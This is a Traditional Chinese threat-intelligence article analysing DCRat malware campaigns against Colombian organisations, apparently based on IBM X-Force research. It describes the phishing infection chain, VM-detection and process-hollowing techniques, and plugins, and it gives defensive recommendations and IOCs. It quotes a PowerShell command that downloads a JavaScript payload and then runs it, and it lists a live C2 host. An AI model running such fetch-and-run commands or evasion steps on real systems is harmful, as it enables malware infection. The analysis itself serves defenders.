1. 簡介
DCRat 作為 MaaS 的威脅演變

DCRat (Dark Crystal RAT),一種模組化的遠端存取木馬,以 Malware-as-a-Service (MaaS) 模式販售,自2024年起在拉丁美洲快速增加。以財務動機為主的 Threat actor—特別是 Hive0131 —利用其低成本的訂閱模式(兩個月7美元)針對哥倫比亞組織進行以司法為主題的釣魚誘餌攻擊 [1]。本報告剖析了近期攻擊中觀察到的技術架構、規避技術及操作流程,特別強調 VMDetectLoader 反分析模組及記憶體執行鏈。

DCRat如何繞過防禦?深入剖析其反鑑識技術 | 資訊安全新聞

2 技術架構分析

2.1 多階段感染鏈

近期攻擊使用了兩種主要傳播途徑:

  • 內嵌 TinyURL 的 PDF : 釣魚郵件包含指向 TinyURL 的 PDF,這些 TinyURL 會重新導向至 ZIP 壓縮檔(例如: 1Juzgado 08 Civil Circuito de Bogotá Notificacion electronica Orden de Embargo.Uue )。壓縮檔內包含:
    • 無害的誘騙文件
    • 惡意的 JavaScript( *.js )從 paste[.]ee 下載 PowerShell 腳本
    • PowerShell 從 archive[.]org 獲取 JPG(例如: new_ABBAS.jpg ),內含附加的 base64-encoded VMDetectLoader [1]。
  • Google Docs 傳遞的 ZIP : 受密碼保護的壓縮檔(密碼: 3004 )包含批次腳本( *.bat ),這些腳本會:
    • 下載混淆的 VBScript
    • 執行 PowerShell 以取得 VMDetectLoader 載體 JPG [1]。

2.2 VMDetectLoader:反分析與 Payload 解密

基於開源 VMDetector 專案,此 .NET loader(SHA256: 0df13fd42fb4a4374981474ea87895a3830eddcc7f3bd494e76acd604c4004f7 )執行以下操作:

反虛擬機/沙箱檢查

  • 查詢 WMI 類別( Win32_BIOS Win32_MotherboardDevice Win32_DiskDrive )以偵測虛擬化環境 [1]。
  • 比對硬體屬性與 qemu vbox Hyper-V 等字串。
  • 檢查 Windows 服務名稱,尋找分析工具的指示(例如: VBoxService )[1]。

持久性機制

  • 建立排程任務(例如: bimetallism )以執行 JavaScript payloads: 
    WebRequest -Uri '' -OutFile 'C:\Users\Public\Downloads\rhabdosteus.js'; Start-Process 'C:\Users\Public\Downloads\rhabdosteus.js'
  • 設定登錄機碼以自動執行 [1]。

Process Hollowing 注入

  • CREATE_SUSPENDED 標誌使用 CreateProcess() 鎖定 MSBuild.exe (32/64位元)。
  • 透過 ZwUnmapViewOfSection() 解除對程序記憶體的映射。
  • 分配新記憶體,寫入 payload,並使用 SetThreadContext() 重新導向入口點 [1]。
表格:VMDetectLoader 反虛擬機偵測屬性
WMI 類別 檢查的屬性 虛擬機指示
Win32_ComputerSystem Manufacturer , Model VirtualBox , VMware
Win32_BIOS SerialNumber , Version 空值或通用字串(例如: 0
Win32_DiskDrive DeviceID , Caption VBOX HARDDISK
Win32_PnPEntity Description Virtual 為前綴的設備

2.3 DCRat Payload 執行與功能

在繞過沙箱檢查後,VMDetectLoader 將 DCRat
(SHA256: 1603c606d62e7794da09c51ca7f321bb5550449165b4fe81153020021cbce140 )注入記憶體。主要功能包括:

  • AMSI 繞過 :修補 amsi.dll 以規避腳本掃描 [1]。
  • 基於插件的架構
    • keylogger.exe :記錄鍵盤輸入
    • screenshot.dll :擷取螢幕攻擊
    • 透過麥克風/攝影機進行音訊/視訊錄製的自訂插件 [1]。
  • C2 通訊 :使用 AES-CBC 和 HMAC-SHA256 加密與 feb18.freeddns.org:8848 通訊 [1]。

3 攻擊基礎設施與 Threat Actor TTPs

3.1 Hive0131 的操作轉變

歷史上散佈 NjRAT QuasarRAT 的 Hive0131 在2025年採用 DCRat,原因包括:

  • 成本較低與 MaaS 效率
  • 透過記憶體執行增強規避能力
  • Hive0148/0149 (Grandoreiro 銀行木馬)等團體合作 [1]。

3.2 雲端濫用以規避偵測

  • 使用 Google Docs TinyURL archive[.]org 繞過電子郵件過濾 [1]。
  • paste[.]ee 上托管中介 payload 以避免靜態檔案分析 [1]。

4 防禦建議:緩解多階段攻擊

4.1 技術對策

  • 電子郵件安全 :封鎖指向 paste[.]ee 、動態 DNS 域名及 PDF 中的雲端儲存 URL 的連結 [1]。
  • 端點監控
    • 偵測 MSBuild.exe 啟動異常子程序(例如:PowerShell、 wscript.exe )[1]。
    • 搜尋名為 bimetallism 的排程任務或參考 Public\Downloads 的登錄機碼 [1]。
  • 記憶體鑑識 :使用 Volatility 等工具掃描 .NET 元件的反射載入 [1]。

4.2 威脅情報整合

  • 基於 IOC 的封鎖 
    C2 Servers: feb18.freeddns.org:8848
Payload URLs: hxxps://ia601205.us.archive[.]org/26/items/new_image_20250430/new_image.jpg
File Hashes: 1603c606d62e7794da09c51ca7f321bb5550449165b4fe81153020021cbce140 (DCRat)
  • 行為分析 :透過 SIEM 關聯規則建模 process hollowing 模式 [1]。

5 結論:MaaS 經濟與拉丁美洲的目標

DCRat 展現了 進階惡意軟體的商品化 ,使低技能的攻擊者能透過濫用雲端的感染鏈進行隱秘攻擊。Hive0131 從 NjRAT 轉向 DCRat 凸顯了趨勢朝向 專注於規避的載入器 (例如 VMDetectLoader)及記憶體常駐的 payload。防禦者應優先考慮:

  • 主動威脅搜尋 VMDetectLoader 的 WMI 查詢及 process hollowing artifacts [1]。
  • 身份衛生 以對抗啟用初始存取的認證竊取 [1]。
  • AI 增強的釣魚偵測 ,因為攻擊者開始試驗生成式 AI 製作誘餌 [1]。

參考資料

  1. IBM X-Force. (2025). DCRat Presence Growing in Latin America.
Copyright © 2025 版權所有 翊天科技有限公司